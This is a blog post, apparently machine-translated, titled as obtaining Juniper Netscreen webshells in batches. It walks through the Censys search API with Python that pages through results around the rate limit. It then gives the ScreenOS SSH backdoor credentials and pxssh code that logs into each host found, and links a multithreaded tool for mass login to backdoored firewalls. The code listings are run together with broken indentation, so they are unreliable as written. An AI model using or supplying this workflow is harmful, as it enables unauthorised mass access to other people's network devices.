Obtain Juniper Netscreen webshells in batches using Censys

Obtain Juniper Netscreen webshells in batches using Censys

Censys is a new search engine used to search information about networked devices. Security Experts can use it to evaluate the security of their solutions, hackers can use it as a powerful tool to detect attack targets and collect target information in the early stage. Its functionality is very similar to the popular Shodan, but its advantage over Shodan is that it is a free search engine, initially released in October by University of Michigan researchers, currently supported by Google. For more information about Censys, see http://www.freebuf.com/news/89285.html

Bob Worrall, Senior Vice President and Chief Information Security Officer of Juniper, said that two vulnerabilities were discovered during the recent internal code audit, affecting screnos 6.2.0r15-6.2.0r18 and 6.3.0r12-6.3.0r20. One is an unauthorized code vulnerability that decrypts VPN traffic, and the other allows attackers to remotely manage devices through SSH or telnet. Juniper mentioned that access to these systems will be recorded and password authentication will be successful, but attackers can change or delete log entries. For more information about the vulnerability, see http://www.freebuf.com/news/90323.html

After learning about this vulnerability, I tried to use Censys to search for hosts that may have backdoors and perform batch verification. Before completing this task, let me lead you to get a general idea of how to use APIs in Censys.

First, you need an account. Censys is free for registration, so this should be simple. After registration, we can see on our account page that Censys assigns an APIID and a Secret to each of us. In addition, we also note that there is a search frequency limit below, if you use an API, you can only search 120 times every five minutes. We will try again to solve this problem.

Open the API page and we can see that Censys provides six API interfaces: search, view, report, query, export, and data.

Among the provided API methods, we should use search most. Therefore, I will give a general introduction to how to use search. The request address for the search interface is a https://www.censys.io/api/v1/search ?, Where? It can be ipv4, websites, or certificates, which respectively represent searching for ipv4 hosts, websites, and certificates. Our POST request should be a set of json data containing query, page, and fields, where query refers to the corresponding search statement, and page indicates the returned page number, censys always returns one page of data, that is, if you set page 5, it does not return the first five pages of data, but 5th pages of data; fields refers to the fields that you want to include in the returned value and the specific fields that you want to include.

Through the above introduction, we can use Censys to obtain data. For example, if you want to obtain all apache servers, you can construct the Code as follows:

import sysimport jsonimport requests   API_URL = "https://www.censys.io/api/v1"UID = "YOUR API ID"SECRET = "YOUR SECRET"data = {    "query":"80.http.get.headers.server: apache",     "page":1,     "fields":["ip", "location.country"]}res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))results = res.json()if res.status_code != 200:    print "error occurred: %s" % results["error"]    sys.exit(1)for result in results["results"]:    print "%s in %s" % (result["ip"], result["location.country"][0])

Of course, the above Code only returns the data on the first page. If you want to obtain a large amount of data, you can set a page variable to be retrieved cyclically. Note: The page should start from 1 rather than from 0. Of course, this is the problem. Censys only allows us to request 120 requests every five minutes. If we traverse the request directly, an error occurs. Therefore, I added an extension token, if a request takes less than 2.5 seconds, I will delay the remaining time. Otherwise, I will directly perform the next query. Of course, you may have a better solution to this problem.

After Censys is introduced, you should go to the topic. In fact, to check whether the device has a backdoor is to check whether the host can use user = "root ", password = "<% s (un = '% s') = % u" to log on to SSH. I used pxssh OF THE pexpect module to log on to the remote SSH. The specific code is as follows:

def connectSSH(host, user, passwd):try:    ssh = pxssh.pxssh()    ssh.login(host, user, passwd, auto_prompt_reset = False)    return sshexcept Exception, e:    print "%s is not vul" % host

In fact, since the login is not a traditional SSH, but the operation terminal of the firewall, pxssh will think that the login is not successful, but returns a timeout exception, in this case, we detect that if the returned before field contains the Remote Management Console, it indicates that the host has a backdoor.

After integrating all of its code and adding multithreading for optimization, we can get the host that may have a backdoor in real time and check it, the integrated Code address: https://github.com/s0m30ne/JuniperBackdoor